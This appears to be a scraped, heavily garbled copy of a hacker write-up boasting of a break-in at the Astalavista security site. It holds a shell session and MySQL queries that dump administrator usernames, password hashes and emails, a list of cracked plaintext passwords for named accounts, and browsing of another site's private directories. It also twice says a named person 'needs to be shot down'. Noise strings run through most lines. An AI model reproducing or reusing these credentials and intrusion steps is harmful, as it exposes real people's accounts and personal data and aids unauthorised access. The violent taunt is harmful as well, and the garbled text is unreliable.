<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
9 K# h% I3 B0 d7 F# h <docs>http://blogs.law.harvard.edu/tech/rss</docs>5 k- B9 f% x2 R2 [# r
<generator>Astalavista.com</generator>+ t4 W0 A4 G; J: q( U+ u: Z
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘' q1 F+ C& g$ _8 l
</channel>
+ Q1 e- t: i" Q& x& j+ u( F7 _9 B</rss>’;
! L! I& y$ s- i& L2 u, e8 C
( D, u: j3 G* ^+ t3 V& j# E if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {5 Y6 S! u Z( J! [* K' ~, b
unlink (FULLPATH . ‘/feed/exploits.xml’);
- V7 @1 K; }% o7 {0 q6 g }
& w: z' B3 e. c( [
: H6 y4 O+ X" ^7 N file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);! J9 `5 ~) h0 t, I
[snip]+ {; T' ~6 ~/ E1 L5 }
5 S) N+ c* D0 F; v8 Vsh-3.2$ cat exploits.sh1 F; @* T. z9 j/ w" o
#!/bin/sh
4 p& a. n. _9 X% U6 E
2 H+ ^5 o6 r8 r% I###########################################################! R: N, L. q4 a4 n
# #
; r5 D, e* b4 k$ \8 C0 n$ I; K3 L# Title: milw0rm exploits adder #
3 r9 D; V0 b; u3 k$ ^# Description: Add all milw0rm exploits to the #
9 O& ~5 H' f% {$ {, @6 m5 W# t# Astalavista.com database #2 D) c4 A# q" O! m( Y& u
# # u4 ~$ L* F0 c7 ]: b
# Company: Astalavista Group #
& O0 ~4 c5 o" B& u# Author: Paulo M. Santos #
4 r% H3 S/ V0 ~1 S3 G% {2 I# E-Mail: 链接标记paulo.santos@astalavista.ch #
- |( G1 [$ a6 k; D p7 s( D# #
, ^4 B7 O( l' \) _: i. i###########################################################( h; ^' R8 A* c- n# e. U& i
3 ~4 A# Y. y( S; N. z3 `
# path
& o% l" p6 y/ Sthis_path=/home/com/public_html/modifications/cronjobs
( I2 G; X4 o G( P" O- G
6 k8 a+ o% l) e# c) U$ A0 F# change directory1 ]+ `9 Y5 N* q! l' }- a
cd $this_path
1 i5 f0 }" Z- @+ u. G5 ucd tmp/
5 H# P0 ~* A; L1 ]
& U4 H6 [7 r w9 R8 Q6 d X# delete files
& ]4 l8 ^% ?9 \rm -rf milw0rm.tar.* &
/ l! ~" ~2 {7 k% ^' ]rm -rf milw0rm/ &
8 q4 A6 O8 o3 H$ A5 P( S
- A6 l9 S2 |9 m' ]# wget milw0rm paket, s& P" w+ M3 i, m- g) t% N
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]3 P4 r5 n1 i# r) N
, E2 ]6 [5 V" z& w5 Q9 g7 H# extract milw0rm paket
9 p4 L/ B4 m3 n: K4 D9 u Z4 ^tar -xvf milw0rm.tar.bz2
1 \# Q. U. }% ~/ } j! D8 I1 L7 I* M$ ?% A* d
# change owner5 a' M( V: O6 K: L
chown -R com .' o, `0 g* \( w( |2 }
chgrp -R com .
8 O7 u/ \* x; z2 {" W6 Z, o
! ?4 y% x* I5 L8 a o% l# execute php script9 m+ W- L: i* \+ r: Y0 N+ y
cd $this_path1 e6 K: W' z/ A. a
php -q exploits.php
# e) C9 v1 k8 m" d
6 n( `9 t+ X; ~7 z# G% W# delete files( p3 Z$ h. y6 {! f8 ^8 ]
rm -rf tmp/milw0rm.tar.*# ~$ |* V+ o9 x- I1 ^) e& g; y
rm -rf tmp/milw0rm/
# s+ u* `( b1 z9 l
) T5 S0 H# H! c+ A% R4 [) gsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
7 i% I, t) [- Q+ p9 |; jPaulo M. Santos needs to be shot down.
9 W( H$ H X. v, _& [0 U& Y8 j6 h- j# ^, {3 O4 O: P9 q: K
mysql -u contrexxuser2 -p
/ H1 c8 E) }5 m0 l* \0 D0 d" bEnter password:& x% m& A& s1 O. x5 p
Welcome to the MySQL monitor. Commands end with ; or \g.) V: ~% I. [$ F1 O
Your MySQL connection id is 261694& Z# {. Q h& n" P% [ t7 z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
' B6 q: l1 G% E: Y8 N
5 X) R" Z& q8 L3 r6 Z: y8 r- Y4 YType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( |$ g. Q0 x4 L6 s
9 F- F- m2 Z/ r( ]mysql> show databases;* a6 a! F+ d- |! s4 R$ f8 @
+——————–+6 K$ V" s% k8 B4 l
| Database |
7 u$ j0 g: I. a" ^0 h3 k+——————–+
% s. j3 {* x& r1 C8 ~| information_schema |7 Y5 { y4 L" Y. _' `/ W) H
| com_contrexx2 |$ R" c% G3 C3 D- X* Y! Z
| com_contrexx2_live | [; P4 e1 R4 C# C
| test |2 b5 G1 d) j6 `5 d! _ P
+——————–+) ]) _9 b" k0 C& g
4 rows in set (0.00 sec)
/ D- O; F5 P) P. E: i$ l3 X# n& Z. l4 w
mysql> use com_contrexx2_live9 K" y* U8 j0 t, S! ~' n. j
Database changed
+ s6 X6 L D! Y9 w8 v) gmysql> show tables;
( P$ k9 W: }& e/ J3 T) ?8 m) C+————————————————–+3 \* M" s, ]1 s2 S
| Tables_in_com_contrexx2_live |
+ F" ^4 K5 Z: }2 K( Q0 J M: z/ ?7 `: m+————————————————–+
/ L; ^% S5 M0 I+ r| cc_banner_counter |- d- Y* k! r. r2 ^
| cc_search_counter |
& z* h7 a* q0 a/ `. q F| contrexx_access_group_dynamic_ids |
1 j: X' d8 y- m| contrexx_access_group_static_ids |
- o: T9 H) o! h! l- e/ L| contrexx_access_rel_user_group | |- y/ C# y( A- ], U4 n: q; {
| contrexx_access_settings |
; B! p1 N( h, c7 c# o3 F| contrexx_access_user_attribute |" \. ~3 N( i- g; v0 J7 K
| contrexx_access_user_attribute_name |; h( l8 w8 `8 r9 r+ J
| contrexx_access_user_attribute_value |# e) P$ Z8 M- `( R+ V
| contrexx_access_user_core_attribute |
, s2 q2 _/ v- ^; n| contrexx_access_user_groups |
' J- P+ [! K; w6 V+ N% z| contrexx_access_user_mail |
- A q/ O) I1 V& f& o8 i- f% v3 U8 P) H| contrexx_access_user_profile |
4 E* }' t( P7 z+ `4 x# r| contrexx_access_user_title |3 p+ { d# Q$ m
| contrexx_access_user_validity |: t& K; z+ z% V! j) l0 x
| contrexx_access_users |1 ]( v# ~" d% W) Z! k7 V' m
| contrexx_backend_areas | \2 W! t8 T3 ?, Z$ d! F' p
| contrexx_backups |/ @8 I1 ]' q0 u0 o" D
| contrexx_content |
9 \8 T3 W- q' \7 w4 U0 H8 || contrexx_content_history |" j" g& w5 p5 J2 X- |# R
| contrexx_content_logfile |2 O+ n: q* j p$ g U7 h7 f- q
| contrexx_content_navigation |
5 l' K4 A3 I( a| contrexx_content_navigation_history |3 k s- f! [/ G: E$ l+ `/ y
| contrexx_ids |
+ K7 _# x! g0 M' `( j- e% x( {| contrexx_languages |7 E8 q* Q1 H1 n1 s
| contrexx_lib_country |. u- `. ^1 u# ]+ {& @: g# ~( m
| contrexx_log |
" [( V. B7 d4 s4 k| contrexx_module_alias_source |" `+ m+ w& L9 e/ z
| contrexx_module_alias_target |
$ G$ I, @1 q0 U* I4 x& a| contrexx_module_block_blocks |8 c: C7 y( }0 d( q
| contrexx_module_block_rel_lang |& N& M8 A+ g6 u0 J `( Q# t3 G
| contrexx_module_block_rel_pages |/ d2 u6 e6 Z2 U; J8 m: a$ F. K
| contrexx_module_block_settings |9 L: u, P. m: o d7 V; {5 {% P) u; w7 i
| contrexx_module_blog_categories |
v7 q- ]* d- L" J| contrexx_module_blog_comments |, J! F# ^' {/ x& C9 M8 t4 c
| contrexx_module_blog_message_to_category |" g+ U1 W+ _4 V N% I
| contrexx_module_blog_messages |
! A$ Y N7 o' `- P) N+ s! P| contrexx_module_blog_messages_lang |
! Q2 H p O/ O2 n M' g| contrexx_module_blog_networks |
7 i9 }0 j/ C* E; H2 U x| contrexx_module_blog_networks_lang |
2 t0 c8 n9 U% M; l& _- K| contrexx_module_blog_settings |2 z7 b: t; f9 t% M* I9 t. D# k
| contrexx_module_blog_votes |. O. r/ {( A$ d! I+ ^+ Z
| contrexx_module_calendar |$ z1 b8 v8 _9 ]" R# u
| contrexx_module_calendar_access |; `9 D: o" N' K
| contrexx_module_calendar_categories |
% C' K% H2 d2 P; F5 D| contrexx_module_calendar_form_data |
5 w) D( k! d; I4 x6 i" i| contrexx_module_calendar_form_fields |+ `. a$ y& J# r0 B* {
| contrexx_module_calendar_registrations |
/ U3 u+ q' l7 a: g" k| contrexx_module_calendar_settings |
" g/ L. k m( H5 ~ Z| contrexx_module_calendar_style |
, x9 {5 I! y+ M2 |$ [7 ~# @| contrexx_module_contact_form |
' V. T$ S2 s: y| contrexx_module_contact_form_data |
- M0 b2 C( q+ _) x3 x| contrexx_module_contact_form_field |
% @! e- ^. a9 t6 @' y| contrexx_module_contact_settings |+ L5 d( e2 {& T- V! d& I
| contrexx_module_data_categories |2 V$ a5 V& w3 N% c8 M' p$ T
| contrexx_module_data_message_to_category |4 s. j/ B$ X: _4 r* O
| contrexx_module_data_messages |
5 i2 Q( j5 H* |: \" U/ |. w| contrexx_module_data_messages_lang |
4 ~2 O/ V( E; A2 U* o| contrexx_module_data_placeholders |
8 T0 p* M) X5 ]; \0 j# \| contrexx_module_data_settings |
5 T& {2 j% @- }% \$ ?# }| contrexx_module_directory_access |
0 p% a- h; w' @) {, k+ E| contrexx_module_directory_categories |
7 q6 q& A! j2 k0 I( h* m( v| contrexx_module_directory_dir |8 l8 l+ T/ [6 i
| contrexx_module_directory_inputfields |
- R! i: N3 h' R4 o: y1 T| contrexx_module_directory_levels |
2 T" ~0 k9 F8 _( e8 E) Z6 Z| contrexx_module_directory_mail |: x2 [5 T: g" e
| contrexx_module_directory_rel_dir_cat |
, R q2 y; l! v: x6 r( W) X h) ]| contrexx_module_directory_rel_dir_level |
8 F7 J1 w' z6 O' b) {6 }! N| contrexx_module_directory_settings | n- _/ o" Z! ^* I: N' M$ [
| contrexx_module_directory_settings_google |) I( @! C7 Y: W3 w" k9 }: H
| contrexx_module_directory_vote |
. c# N/ n) _. t, @' e* ~ S' M| contrexx_module_docsys |, T. ]5 y! n% \) A- r
| contrexx_module_docsys_categories |3 e) K+ }" D" C( r0 H
| contrexx_module_egov_configuration |
) k+ O3 ^( S) g% u l| contrexx_module_egov_orders |
: ^5 m' C: P P0 J9 o| contrexx_module_egov_product_calendar |% ]$ \% X4 d' s5 S
| contrexx_module_egov_product_fields |
/ F$ j5 o U+ I+ o| contrexx_module_egov_products |! G% F4 e8 `) j w5 O
| contrexx_module_egov_settings |0 u2 Z! Y9 h( o. U- h& n9 z
| contrexx_module_exploits |
7 V$ b- i' `% ~| contrexx_module_exploits_categories |
Z9 J- V& \# U| contrexx_module_feed_category |
. b7 q. [5 x4 q4 ^; ^$ `| contrexx_module_feed_news |
4 F* q2 Y; `: \! S- [9 U) K& q8 Z| contrexx_module_feed_newsml_association |) @, L5 \7 z. R
| contrexx_module_feed_newsml_categories |; D# k! w% Z) ?
| contrexx_module_feed_newsml_documents |' _+ s2 h9 f, J M1 J! i
| contrexx_module_feed_newsml_providers |
. j( R% h( y1 r- E. ]| contrexx_module_forum_access |
9 I/ ?3 s. n9 D$ L5 U: M g0 [+ S| contrexx_module_forum_categories |( d$ ^& u! C e* T: S
| contrexx_module_forum_categories_lang |
7 X/ |0 Q/ N# a; _$ _| contrexx_module_forum_notification |
8 r5 U! ]2 G6 e* ^" r| contrexx_module_forum_postings |& W3 T6 o7 J; j# M- s, R
| contrexx_module_forum_rating | {3 ^- _6 u1 d5 O5 w9 ?
| contrexx_module_forum_settings |
0 i! h: X% f h, O% P| contrexx_module_forum_statistics |
; f+ X: S# r0 L2 I# || contrexx_module_gallery_categories |
: Y/ Z/ {7 u% H| contrexx_module_gallery_comments |; u! ?/ M2 }' Q1 J1 Z' t( X5 m/ t
| contrexx_module_gallery_language |
& ]4 G) w0 Z" s, Z8 g| contrexx_module_gallery_language_pics |
: l* T/ V+ M# a5 L: z: Q| contrexx_module_gallery_pictures |1 ]6 Y& a4 a2 T9 j9 M. _
| contrexx_module_gallery_settings |3 `& N: F6 R+ T" F, k3 p! Q% w
| contrexx_module_gallery_votes |- L4 P. u7 |# e
| contrexx_module_guestbook |
% i( H. P6 e" G" d& J| contrexx_module_guestbook_settings |
7 P+ r& F1 |+ e+ V3 @| contrexx_module_livecam |
6 N8 F& O; ^5 E7 \# P" w9 k& Y| contrexx_module_livecam_settings |- w4 o5 Z0 d# q7 I" j! j6 a
| contrexx_module_market |7 t1 k7 l0 Z3 J+ R E+ [! E/ l
| contrexx_module_market_access |
& g7 w6 a/ x& J| contrexx_module_market_categories |
% D$ V0 _) w/ g: m| contrexx_module_market_mail |3 ^7 G6 _9 h, Q! ^2 t0 a4 E
| contrexx_module_market_paypal |. t3 C, K& t4 i# i! l O% z/ m
| contrexx_module_market_settings |% B$ w3 o+ f7 u! U, c( i
| contrexx_module_market_spez_fields |2 y" i A b7 Q; ~) c8 q/ u2 j. V
| contrexx_module_mediadir_access |
# o6 S1 S4 I- V& M8 `' T3 {| contrexx_module_mediadir_categories |
. b6 G a( R! R& J| contrexx_module_mediadir_comments |
. s& c8 M% o/ ]5 i* _: t| contrexx_module_mediadir_dir |
, E2 M6 F% {" _| contrexx_module_mediadir_inputfields |$ D$ W, e: D- z' [
| contrexx_module_mediadir_levels |
" c; A/ X$ W; u$ k) ?/ R| contrexx_module_mediadir_mail |
?1 {; {. _1 o6 t* g5 l1 C| contrexx_module_mediadir_rel_dir_cat |- L |& _1 {: c8 v. H' {! n3 V' t7 S
| contrexx_module_mediadir_rel_dir_level |
0 W4 o" U) v6 i/ B+ T( n& C| contrexx_module_mediadir_reports |; Q5 @( m# Y; R+ S) a: Q
| contrexx_module_mediadir_settings |0 ]+ h$ n7 O1 z. g* l# k- b
| contrexx_module_mediadir_settings_google |+ |; u4 w) R+ B3 u/ ?0 X
| contrexx_module_mediadir_vote |8 S' d( k; j7 L% ]4 n& u
| contrexx_module_memberdir_directories |
$ ^' O5 I- y* B9 D| contrexx_module_memberdir_name |
! ?$ l# O; k( N| contrexx_module_memberdir_settings |1 J- i2 m( r2 @1 P8 \1 W% f
| contrexx_module_memberdir_values |$ m1 M s9 q, b3 X% P
| contrexx_module_nettools_allowed_groups |3 S$ e8 o$ S) ?/ A
| contrexx_module_nettools_settings |
% z! \$ g; T# U/ C| contrexx_module_news |1 L2 |7 U7 I7 g% ]
| contrexx_module_news_access |& k1 u% q( y% Y9 o
| contrexx_module_news_categories |
2 A9 K) P7 P: B1 s; J/ Q1 h| contrexx_module_news_settings |0 C% A$ r' f2 @
| contrexx_module_news_teaser_frame |
9 M* A/ C6 {3 l' t$ b, Z| contrexx_module_news_teaser_frame_templates |' J# p9 c; s) J2 J; I! s% t
| contrexx_module_news_ticker |& u9 L8 J X0 G) l% ]$ M
| contrexx_module_newsletter |/ ^4 U0 ?+ f, a( ]6 d# ~5 d( Y4 ^2 Z
| contrexx_module_newsletter_attachment |8 ~+ }' q) X% A1 }) ?
| contrexx_module_newsletter_category |
! _8 x+ I6 l, |4 f| contrexx_module_newsletter_confirm_mail |
5 {) p$ g, u2 T& q& Z9 h4 @+ ?| contrexx_module_newsletter_rel_cat_news |
7 {/ {+ \2 S0 y* \& t5 r| contrexx_module_newsletter_rel_user_cat |
& `9 K6 }$ s6 `! v; s" [$ P| contrexx_module_newsletter_settings |9 U5 v- F _* C* ^
| contrexx_module_newsletter_template |
: ?( ?7 V5 c: s. b( S| contrexx_module_newsletter_tmp_sending |3 X' `6 k$ v/ X- W8 S1 R5 h! C" J
| contrexx_module_newsletter_user |
. ?) h; C1 W* d7 i2 W: t! C| contrexx_module_newsletter_user_title |3 E: R0 C) U$ l, x! b/ o6 A: o8 q
| contrexx_module_onlinetools_defaultports |% g- X0 Q- @) e2 u4 W% V: p
| contrexx_module_onlinetools_defaultports_back |2 v4 Y4 F* I; w6 g/ @
| contrexx_module_onlinetools_geolitecity_blocks |, b8 C/ ]/ d* q
| contrexx_module_onlinetools_geolitecity_country |* _$ a; a4 W+ w! _8 H
| contrexx_module_onlinetools_geolitecity_location |
) Y% A k6 n; h. Q& x& n, ]- W| contrexx_module_podcast_category |- z M8 i$ d: y) ]
| contrexx_module_podcast_medium |4 q( j/ I) P5 m( i, A$ A3 Q" E
| contrexx_module_podcast_rel_category_lang | N/ G% C/ l* K1 E
| contrexx_module_podcast_rel_medium_category |3 S; \. V+ K! i
| contrexx_module_podcast_settings |
6 J7 R a4 Z8 z: d/ y5 N) {' H) U| contrexx_module_podcast_template |' P$ S3 H i6 T: I- `2 W X
| contrexx_module_proxydb |
$ Y( O* u5 n* p" T) v: x. E- J3 P, z| contrexx_module_recommend |! A, i1 q1 Q$ a2 K9 Y
| contrexx_module_repository |
n$ \ Q$ k h3 N6 G- L, s3 e9 u| contrexx_module_securitynews_cats |
& O1 b% E9 \3 g4 C| contrexx_module_securitynews_feeds |% A4 e% H% z2 Y% L: S
| contrexx_module_securitynews_news |: @; Y- z' R$ M! ~$ i; a9 C
| contrexx_module_shop_categories |
( L( I R( }/ c1 ^/ b| contrexx_module_shop_config |- c5 ^ b$ C5 v$ O ]; h/ |1 o
| contrexx_module_shop_countries |
$ q0 [/ `* s# {9 X0 ~# ?+ o| contrexx_module_shop_currencies |2 l' x1 r' a( X2 j3 O1 O: w
| contrexx_module_shop_customers |3 b* ?% ?% x+ i( g" i
| contrexx_module_shop_importimg |; Q/ F" y1 y0 B$ z* B. n
| contrexx_module_shop_lsv |
& B, B$ y1 ?! a+ z- J. X6 e| contrexx_module_shop_mail |
7 }- t& B; d; e5 H4 || contrexx_module_shop_mail_content |
7 N- m4 f" F5 {, a| contrexx_module_shop_manufacturer |8 M" ~& |! F& u. z! f
| contrexx_module_shop_order_items |- g( T% T) N3 g) E
| contrexx_module_shop_order_items_attributes |
$ W+ d* `3 F" F5 l# `( N| contrexx_module_shop_orders |% Z7 d: W) _) {; \6 J2 y3 _$ D
| contrexx_module_shop_payment |
; l8 z7 `4 C4 h* R; D" {& I+ K| contrexx_module_shop_payment_processors |
- v3 k; W" A! j6 V| contrexx_module_shop_pricelists |
6 }2 S' U; p6 C4 ?| contrexx_module_shop_products |, S) u$ h% T0 ?# N! r
| contrexx_module_shop_products_attributes |
1 s4 R9 C) f9 t' V% l4 m$ N2 _- l' m| contrexx_module_shop_products_attributes_name |& t- I7 Y* G5 _% V( e' I) D
| contrexx_module_shop_products_attributes_value |
& M5 E k1 V! S! D, u" C| contrexx_module_shop_products_downloads |
4 n0 a/ Y5 \, O) v1 d5 E$ d| contrexx_module_shop_rel_countries |
% W; V2 B% D: Z+ C) r; }| contrexx_module_shop_rel_payment |
* Y0 u9 J9 P& N. }| contrexx_module_shop_rel_shipment |
* t( M: h8 y8 @& t* u K! R9 U| contrexx_module_shop_shipment_cost |$ l$ F! X8 m. j8 Y+ K5 X$ ^1 G9 J
| contrexx_module_shop_shipper |7 b! ^' M1 u3 b$ B
| contrexx_module_shop_vat |; X* D9 D2 z! d
| contrexx_module_shop_zones |9 h, i M1 ~" x) l
| contrexx_module_u2u_address_list |
- O2 B' n* f: K/ W9 {# N K7 E+ Q| contrexx_module_u2u_message_log |
+ [+ @7 q& x. t* C" [" h; v& z| contrexx_module_u2u_sent_messages |# K/ `. w+ q6 `, ]
| contrexx_module_u2u_settings |3 v. O. \, z, n$ m. V
| contrexx_module_u2u_user_log |
( z" |, J( g8 `1 M| contrexx_modules |- N" t; O3 j# K, @1 U* b/ P0 ?
| contrexx_sessions |
' s* R0 d0 R2 d- }# I| contrexx_settings |
) f, L' ?) d5 n6 V; Z| contrexx_settings_smtp | r* D$ m+ a8 k& J! I
| contrexx_skins |; H5 e- B7 `& ?" Q
| contrexx_stats_browser |
# y: x& H3 f' A6 M$ p3 K| contrexx_stats_colourdepth |% D9 ~6 ?! h& b: [! O' d* U5 L
| contrexx_stats_config |4 x4 q" F+ e, R ]( F2 q1 a
| contrexx_stats_country |- b6 g' {* G" x0 i
| contrexx_stats_hostname |
m3 [$ z0 x$ q& n3 Q: n' W| contrexx_stats_javascript |5 }8 V3 f! c8 p1 o
| contrexx_stats_operatingsystem |
8 D; R/ S9 U8 ^% i4 h" L, R| contrexx_stats_referer |
2 Q! ~& G4 L+ e: Z| contrexx_stats_requests |
2 v6 f3 K" I' B% E. X( }| contrexx_stats_requests_summary |
; ~+ [" K) Y( [| contrexx_stats_screenresolution |
3 c8 m) x2 c7 a| contrexx_stats_search |
/ L2 e+ @: z& [* K! Z& c| contrexx_stats_spiders |
; V$ D# T; a+ p4 m4 w" @9 j| contrexx_stats_spiders_summary |' [9 ^) V; {/ o, Q( z
| contrexx_stats_visitors |! H- d! w$ b5 k# M- a
| contrexx_stats_visitors_summary |# d) i" o+ q+ R! ?4 O
| contrexx_voting_additionaldata |" |7 F: x/ Q" o- z
| contrexx_voting_email |. d/ N0 T: w1 M, o: v1 \- \
| contrexx_voting_rel_email_system |3 L0 s6 Z) ]5 z+ n8 \, T
| contrexx_voting_results |
@. S1 E$ h/ [$ s5 g| contrexx_voting_system |& x/ V' C. k* v, H7 ?( l% I
| foo |
3 k$ s( s2 _! X Y+————————————————–+
) M n. i" z+ j9 P$ _227 rows in set (0.01 sec)4 w8 y$ E' q% H2 ~# M) W
8 a; x- Y0 Y# W5 ?1 f- K" Y9 n5 wmysql> select count(*) as skids from contrexx_access_users;
9 B, s5 y. M+ w+ K+——-+5 D. b1 Y0 X& z$ q( {0 J& s
| skids |- U2 X, Z. P4 y Q/ w; \, k
+——-+
, d6 _- c. E G, ^# G6 Z| 53699 |
' @4 g1 A' `& i6 o6 ~+——-+
" x+ t0 S/ |+ e k1 row in set (0.00 sec)+ R4 j5 @# a- l& t
% B0 E3 e; e- e' \$ q, ?) s: mmysql> describe contrexx_access_users;
% x4 U* Y9 ^* q8 _- m" v+ r; N8 [+——————+——————————————+——+—–+————–+—————-+
' C( _0 y1 M, B6 {$ F| Field | Type | Null | Key | Default | Extra |" V3 p5 J& X) b' Q0 T" g A) @4 k
+——————+——————————————+——+—–+————–+—————-+ y3 W! u4 i& a. L# S% t
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 p2 \" u8 j7 b" ^% g| is_admin | tinyint(1) unsigned | NO | | 0 | |- V. {, `, a4 R
| username | varchar(40) | YES | MUL | NULL | |* j( ~: S' ^5 \5 ~- m/ M |- b
| password | varchar(32) | YES | | NULL | |
' s( [9 h# T6 Q) Y| regdate | int(14) unsigned | NO | | 0 | |
2 @& j# n' D4 o8 T, R" m| expiration | int(14) unsigned | NO | | 0 | |
( ]( F! c. ?6 d2 ] p H3 m| validity | int(10) unsigned | NO | | 0 | |
7 S, h# w5 D; @6 {$ {: Z| last_auth | int(14) unsigned | NO | | 0 | |
2 d( X% o; }" C) J1 n$ d| last_activity | int(14) unsigned | NO | | 0 | |
l/ D" a3 ?, W M- D| email | varchar(255) | YES | | NULL | |5 {1 r6 k9 {: t) J8 I7 a6 [
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |+ ^! x5 N9 f" c6 G- S
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
R$ l* ^- }1 J8 m# ^4 N! l( c G| backend_lang_id | int(2) unsigned | NO | | 0 | |( ?0 T3 S" [* ^
| active | tinyint(1) | NO | | 0 | |# E# b( K" I5 {/ X% _
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |# Q9 r$ q2 D" c# U) E
| restore_key | varchar(32) | NO | | | |2 U6 y+ W& v$ q( c
| restore_key_time | int(14) unsigned | NO | | 0 | |
; k! N0 A. _' ]# N| u2u_active | enum(’0′,’1′) | NO | | 1 | |
+ b* O1 w* P% H8 H: l, ~+——————+——————————————+——+—–+————–+—————-+
0 ?% Z- ?7 ?" x0 s9 }& w18 rows in set (0.00 sec)
3 Q" c3 T' Q7 P" q0 U7 ^. v4 I- W5 O: |) A- ]+ D" [ p5 k
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
; k. ^2 d/ N9 W' @! ^1 a# I1 ]+————+———————————-+—————————–+- S9 M3 Q/ w! y
| username | password | email |+ e2 {6 o# t9 S% O9 E
+————+———————————-+—————————–+
/ ^4 i1 r# F* g' Z' V0 |" s| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
( e2 w6 U: z1 R5 Z6 G- t. n| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |/ _" K$ A6 v* I' u% y
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
! t+ ~) J- C: d0 T0 K: Q" s. D| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |% | c3 L8 o' {5 z, `
+————+———————————-+—————————–+ y) X1 Z% ? U3 ^1 G
4 rows in set (0.04 sec)% I' l, S0 H! K/ ^$ \
7 z) {/ y! d6 d; K3 ^+ X( D! |mysql> exit;
) X3 D. S+ Q* } r1 J, b+ mBye
! X0 L* B1 m' X: M! }- o. j& j" |9 a- j5 h$ b
[~] There you go, your “team of security and IT professionals” is a joke.
8 W5 W* N* B9 f- p7 u$ Y$ C- s
4 H, K$ c+ X9 g8 l0 J/ h/ n) G6 ^+——————————+% b/ ]# K4 B- @' R/ J
system:f82BN3+_*9 `3 P) T+ ~7 t6 K, U9 i
Be1er0ph0r:belerophor4astacom. B H6 q& D' ^, O" \
prozac:asta4cms!' ?/ c2 \+ E0 [
commander:mpbdaagf6m
% R7 H, `/ K# ^7 ^, O$ vsykadul:ak29eral
0 W l3 ?: B4 m7 D+——————————+7 L5 f, G% \9 _" W% f) f
* w% M, L9 B( r
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
2 U3 n+ J2 {( \! r…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
9 w# Z/ J3 D) F% T, {, l- A3 _9 J( Q& Z$ p: Q7 V" |! |
[~] Lets move to astalavista.net now,9 p0 U) }7 c! o. r
& L# F% ~% ?0 s# a
From <链接标记[url]https://www.astalavista.net/[/url]>:6 I+ F# T, u; U0 y
>> Everyone knows that the best defense is a good offense.8 u4 X* m5 i y! Q
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
# B9 e+ E/ B: h0 q2 j$ A K* A* @; o>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.- O+ U x4 Y% i0 Y* ~8 J
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
3 s& Q2 H0 X+ f8 k
7 y. U ^& J+ Q \& ^2 P. L>> Go ahead, try and hack our server . in a completely legal way!+ g" `9 r! @! [8 G# Q0 E
>> Learn by doing: We offer our members tricky tasks and challenges on an% a+ v' `/ a4 k; }4 ^; p
>> ongoing basis so you can test your knowledge and abilities. You can also
& s! {" `% `. p' y>> demonstrate what you.ve mastered by taking part in regular hacker contests
. d# h D: I2 l% F S+ A2 c* G5 y>> and war games
1 ?- `3 Y# X' \. N! g, Z$ I: U6 g7 G
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!* U. u; D& i% M& L; A* U9 k3 A* j7 j
" _% w+ }5 ?+ w[-] Tricky task: Find home dir of astalavista.net
6 ^( o) s) z& B& Q( e! g( i8 R* G+ I" o0 y
sh-3.2$ ls -la ~astanet3 n* { C& i! j1 w" h" u' t
total 483 ]0 a4 e( k) B) t6 E* v0 \
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .0 o& t8 O/ o; C( Q/ a$ W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .., `9 ?9 J7 ~* Z" O6 N
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
( r; {' y* {& o2 M* F-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- A% D; C- X, M5 @& e- |( g5 N
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
. l. m3 u8 b. X5 T-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile3 u6 l) T6 q+ G2 p+ U- o b
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# z, X3 ?, U# N# n
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains6 k* T: ^6 l3 Y& a) E
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
8 O, ?# i# e* G3 q2 Hdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail" o' G+ |- |* \9 A* v+ U
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
% x( q, z% y% {" L. l$ ^6 a-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
$ L$ _6 Y; R# ^2 [& F8 {. p+ N" A
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
8 w5 V. m( t3 i$ H4 f1 N8 R2 @9 vsh-3.2$ ls -la+ B. N8 R. J8 a3 B! k: B
total 2001 q2 i3 ~6 a3 R% S' @! ?; W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
$ a! N8 n* j$ Z0 ]( cdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
5 f6 P, C$ m ]3 Tdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007! [2 e/ d3 b3 v- F
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql& Z/ F+ k4 o9 A' k K' f# ^8 _
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com/ q8 B& @# n! M0 H0 b8 `, q& c
